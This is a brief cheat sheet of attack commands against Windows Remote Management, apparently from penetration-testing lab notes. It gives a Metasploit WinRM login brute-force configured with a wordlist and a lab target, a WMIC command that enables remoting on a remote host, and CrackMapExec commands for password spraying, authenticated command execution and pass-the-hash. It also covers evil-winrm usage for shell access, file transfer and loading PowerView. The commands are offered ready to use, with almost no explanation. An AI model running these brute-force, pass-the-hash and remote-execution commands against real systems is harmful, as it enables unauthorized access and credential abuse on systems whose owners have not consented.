WinRM 5985 5986

1. Metasploit - WinRM Login Scanner

use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.11.1.13
set USERNAME DISCO
set PASS_FILE /usr/share/wordlists/fasttrack.txt
set DOMAIN disco.thinc
run

2. Activate Remotely Using WMIC

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

3. Bruteforce with CrackMapExec

• Bruteforce WinRM with a Username and Password List:

  crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

• Check Credentials (Username + Password) and Execute CMD Command:

  crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

• Pass-the-Hash Authentication with PowerShell Command Execution:

  crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

4. EvilWinRM

• Using EvilWinRM with Username and Password:

  evil-winrm -i 10.10.10.10 -u redcliff -p "password123" -s .

• Upload/Download Files:

  • Upload a file to the target:

    upload local_filename destination_filename

  • Download a file from the target:

    download remote_filename destination_filename

• List All Services:

  services

• Load Local PowerShell Scripts:

  Powerview.ps1

• Menu Listing Loaded Modules: Once inside EvilWinRM, you can view the available modules:

  menu